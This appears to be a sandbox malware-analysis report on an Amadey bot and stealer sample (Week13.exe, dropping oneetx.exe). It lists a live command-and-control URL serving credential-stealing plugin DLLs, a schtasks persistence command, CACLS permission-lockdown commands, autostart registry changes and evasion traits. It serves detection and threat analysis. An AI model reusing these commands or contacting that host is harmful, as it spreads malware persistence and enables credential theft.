                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/Plugins/cred64.dllx
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.php
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=N
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phpc
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phpd
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phpded
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phpe5a2ab05
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phppd
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phppdR
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/index.phpt
                  Source: Week13.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.spyw.winEXE@26/6@0/1
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeFile created: C:\Users\user\AppData\Roaming\006700e5a2ab05Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1252:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_03
                  Source: C:\Users\user\Desktop\Week13.exeFile created: C:\Users\user\AppData\Local\Temp\cb7ae701b3Jump to behavior
                  Source: Week13.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Week13.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Week13.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\Desktop\Week13.exeFile read: C:\Users\user\Desktop\Week13.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Week13.exe "C:\Users\user\Desktop\Week13.exe"
                  Source: C:\Users\user\Desktop\Week13.exeProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&Exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:R" /E
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:N"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:R" /E
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Source: C:\Users\user\Desktop\Week13.exeProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /FJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&ExitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:R" /EJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:N"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:R" /EJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{515980c3-57fe-4c1e-a561-730dd256ab98}\InprocServer32Jump to behavior
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Week13.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: Week13.exe, oneetx.exe.0.dr
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Persistence and Installation Behavior

                  barindex
                  Yara detected Amadey bot
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000001.00000002.4482643286.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4482643286.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: oneetx.exe PID: 6160, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Week13.exeFile created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeJump to dropped file

                  Boot Survival

                  barindex
                  Creates an undocumented autostart registry key
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"
                  Source: C:\Users\user\Desktop\Week13.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeWindow / User API: threadDelayed 6023Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeWindow / User API: threadDelayed 3869Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6508Thread sleep count: 6023 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6508Thread sleep time: -180690000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 2952Thread sleep time: -50000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 1252Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6508Thread sleep count: 3869 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6508Thread sleep time: -116070000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Week13.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeThread delayed: delay time: 50000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeThread delayed: delay time: 30000Jump to behavior
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@B
                  Source: Week13.exe, 00000000.00000003.2020280700.00000000011F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4482643286.0000000000D36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\Week13.exeProcess created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /FJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&ExitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:R" /EJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:N"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:R" /EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeQueries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeQueries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformationJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Amadey bot
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000001.00000002.4482643286.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4482643286.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: oneetx.exe PID: 6160, type: MEMORYSTR
                  Yara detected Amadeys stealer DLL
                  Source: Yara matchFile source: Week13.exe, type: SAMPLE
                  Source: Yara matchFile source: 00000000.00000000.2018110902.0000000000611000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000000.2659622976.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2024090733.0000000000611000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.3258747374.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2072680147.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.2661827573.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3859111470.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4482407558.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000000.3858755574.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000000.4459397310.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.2023252824.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4464203230.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
